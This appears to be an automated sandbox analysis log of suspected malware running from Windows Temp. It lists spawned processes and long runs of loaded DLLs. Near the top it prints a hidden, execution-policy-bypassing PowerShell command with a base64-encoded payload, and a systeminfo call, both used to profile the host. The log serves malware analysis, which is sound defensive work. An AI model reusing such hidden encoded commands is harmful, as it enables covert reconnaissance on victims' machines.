Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winnsi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ondemandconnroutehelper.dll
